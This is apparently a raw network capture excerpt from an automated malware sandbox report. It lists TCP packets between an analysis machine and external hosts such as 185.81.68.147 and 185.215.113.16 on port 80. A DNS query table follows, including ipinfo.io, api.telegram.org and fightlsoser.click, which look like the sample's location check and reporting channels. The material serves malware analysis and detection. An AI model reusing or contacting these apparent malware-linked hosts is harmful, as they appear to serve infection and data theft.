Dec 12, 2024 16:48:51.227155924 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.228032112 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.228089094 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.228142023 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.229271889 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.229285002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.229299068 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.229322910 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.229357004 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.230232954 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.230246067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.230308056 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.231223106 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.231946945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.231995106 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.232265949 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.232348919 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.232625961 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.233252048 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.233395100 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.233443975 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.234308004 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.235359907 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.235372066 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.235385895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.235405922 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.235435963 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.236310005 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.237147093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.237211943 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.237409115 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.237421989 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.237471104 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.238388062 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.238400936 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.238454103 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.239440918 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.239454985 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.239600897 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.240360022 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.240433931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.240490913 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.241395950 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.241741896 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.241794109 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.242384911 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.242511988 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.242562056 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.243463039 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.243474960 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.243527889 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.244412899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.244760990 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.244811058 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.245419979 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.306628942 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.384483099 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.384627104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.384772062 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.384942055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.385013103 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.385065079 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.385966063 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.386948109 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.386981010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.387093067 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.387254953 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.387697935 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.388004065 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.388376951 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.388427973 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.389013052 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.389151096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.389199972 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.390074968 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.390089035 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.390140057 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.391112089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.391127110 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.391176939 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.392055035 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.392369032 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.392416954 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.393171072 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.394171000 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.394186020 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.394198895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.394239902 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.394239902 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.395112991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.395773888 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.396141052 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.396193027 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.396846056 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.396899939 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.397186041 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.397200108 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.397330999 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.398185968 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.398473024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.398515940 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.399192095 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.399909019 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.399976015 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.400209904 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.400223970 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.400269032 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.401247978 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.401629925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.401690960 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.402231932 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.402251005 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.402307034 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.403317928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.403332949 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.403398037 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.404246092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.404824018 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.404875040 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.405283928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.405778885 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.405895948 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.406300068 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.407318115 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.407367945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.407368898 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.407381058 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.407418966 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.408288002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.409329891 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.409343958 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.409368038 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.409375906 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.409419060 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.410429955 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.410975933 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.411376953 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.411391973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.411421061 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.411453009 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.412389994 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.412689924 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.412734985 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.413384914 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.414035082 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.414077044 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.414417982 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.414432049 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.414473057 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.415501118 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.415505886 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.415535927 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.416440010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.416889906 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.416949034 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.417462111 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.417689085 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.418457985 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.418524981 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.419502974 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.419516087 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.419528961 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.419581890 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.420526028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.420908928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.420921087 CET	80	49970	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:51.420953989 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.420974970 CET	49970	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:51.421529055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.421576023 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.422529936 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.422569036 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.422653913 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.423532963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.423587084 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.423926115 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.424571991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.424612045 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.424695015 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.424725056 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.425669909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.425682068 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.425714970 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.426656008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.427974939 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.427988052 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.428035975 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.428036928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.428848028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.428886890 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.429269075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.429301977 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.429653883 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.429666042 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.429697990 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.430625916 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.431662083 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.431674957 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.431699991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.431720972 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.431744099 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.432641029 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.432791948 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.432828903 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.433677912 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.434060097 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.434097052 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.434731960 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.434901953 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.434950113 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.435658932 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.435720921 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.438452005 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.558244944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.751684904 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:51.751954079 CET	49975	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:51.862247944 CET	49976	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.872003078 CET	80	49975	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:51.872116089 CET	49975	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:51.872456074 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:51.872567892 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:51.876072884 CET	49975	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:51.982003927 CET	80	49976	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:51.982600927 CET	49976	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.982600927 CET	49976	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:51.996036053 CET	80	49975	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:52.102677107 CET	80	49976	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:53.217140913 CET	80	49975	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:53.217171907 CET	80	49975	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:53.217185020 CET	80	49975	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:53.217232943 CET	49975	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:53.217304945 CET	80	49975	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:53.217318058 CET	80	49975	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:53.217336893 CET	80	49975	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:53.217339993 CET	49975	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:53.217350006 CET	80	49975	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:53.217365980 CET	49975	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:53.217391968 CET	49975	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:53.217477083 CET	80	49975	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:53.217489958 CET	80	49975	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:53.217500925 CET	80	49975	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:53.217511892 CET	49975	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:53.217528105 CET	49975	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:53.217541933 CET	49975	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:53.308237076 CET	80	49976	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:53.308260918 CET	80	49976	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:53.308273077 CET	80	49976	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:53.308317900 CET	49976	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:53.308408022 CET	80	49976	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:53.308419943 CET	80	49976	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:53.308432102 CET	80	49976	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:53.308448076 CET	80	49976	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:53.308453083 CET	49976	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:53.308468103 CET	49976	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:53.308594942 CET	80	49976	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:53.308607101 CET	80	49976	185.81.68.147	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 12, 2024 16:48:15.249828100 CET	192.168.2.10	1.1.1.1	0x9ea5	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:48:18.026840925 CET	192.168.2.10	1.1.1.1	0x1137	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:48:24.176158905 CET	192.168.2.10	1.1.1.1	0x2ad9	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:48:26.290509939 CET	192.168.2.10	1.1.1.1	0x6d06	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:06.307976007 CET	192.168.2.10	1.1.1.1	0x7eef	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:06.564547062 CET	192.168.2.10	1.1.1.1	0xce69	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 12, 2024 16:49:06.946485043 CET	192.168.2.10	1.1.1.1	0xea50	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:06.947093010 CET	192.168.2.10	1.1.1.1	0x398	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:07.182641029 CET	192.168.2.10	1.1.1.1	0x7e15	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:07.182837963 CET	192.168.2.10	1.1.1.1	0x8145	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:07.333777905 CET	192.168.2.10	1.1.1.1	0xec6b	Standard query (0)	youtube.com	28	IN (0x0001)	false
Dec 12, 2024 16:49:07.334072113 CET	192.168.2.10	1.1.1.1	0xcd28	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 12, 2024 16:49:25.449732065 CET	192.168.2.10	1.1.1.1	0x7f0b	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:25.449892044 CET	192.168.2.10	1.1.1.1	0x17dc	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 12, 2024 16:49:41.747917891 CET	192.168.2.10	1.1.1.1	0x81f3	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 12, 2024 16:49:42.340625048 CET	192.168.2.10	1.1.1.1	0x549e	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:42.719841957 CET	192.168.2.10	1.1.1.1	0x18d8	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:44.066488981 CET	192.168.2.10	1.1.1.1	0x3248	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:44.220676899 CET	192.168.2.10	1.1.1.1	0x61cc	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:44.220796108 CET	192.168.2.10	1.1.1.1	0xe2db	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 12, 2024 16:50:04.730098963 CET	192.168.2.10	1.1.1.1	0x37a5	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:04.730297089 CET	192.168.2.10	1.1.1.1	0x303d	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Dec 12, 2024 16:50:08.693980932 CET	192.168.2.10	1.1.1.1	0xfee7	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:08.694077969 CET	192.168.2.10	1.1.1.1	0xf659	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Dec 12, 2024 16:50:09.680331945 CET	192.168.2.10	1.1.1.1	0x31a5	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:09.680331945 CET	192.168.2.10	1.1.1.1	0x487b	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Dec 12, 2024 16:50:09.680680037 CET	192.168.2.10	1.1.1.1	0x5223	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:09.680680037 CET	192.168.2.10	1.1.1.1	0xc036	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Dec 12, 2024 16:50:09.743360043 CET	192.168.2.10	1.1.1.1	0x6eb4	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:09.743566990 CET	192.168.2.10	1.1.1.1	0x1b1d	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Dec 12, 2024 16:50:14.227915049 CET	192.168.2.10	1.1.1.1	0xb8f7	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:14.228207111 CET	192.168.2.10	1.1.1.1	0xc78a	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 12, 2024 16:50:22.075401068 CET	192.168.2.10	1.1.1.1	0xfb4f	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 12, 2024 16:50:22.917496920 CET	192.168.2.10	1.1.1.1	0xca8f	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:26.851718903 CET	192.168.2.10	1.1.1.1	0xa358	Standard query (0)	support.mozilla.org	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:26.874703884 CET	192.168.2.10	1.1.1.1	0x809f	Standard query (0)	fightlsoser.click	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.036680937 CET	192.168.2.10	1.1.1.1	0x28cd	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.100305080 CET	192.168.2.10	1.1.1.1	0xd87d	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.100616932 CET	192.168.2.10	1.1.1.1	0x2e18	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.130932093 CET	192.168.2.10	1.1.1.1	0x809f	Standard query (0)	fightlsoser.click	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.286413908 CET	192.168.2.10	1.1.1.1	0x20de	Standard query (0)	youtube-ui.l.google.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.287324905 CET	192.168.2.10	1.1.1.1	0x9136	Standard query (0)	star-mini.c10r.facebook.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.294176102 CET	192.168.2.10	1.1.1.1	0x28cd	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.679580927 CET	192.168.2.10	1.1.1.1	0x26b	Standard query (0)	star-mini.c10r.facebook.com	28	IN (0x0001)	false
Dec 12, 2024 16:50:27.679933071 CET	192.168.2.10	1.1.1.1	0xdd57	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	28	IN (0x0001)	false
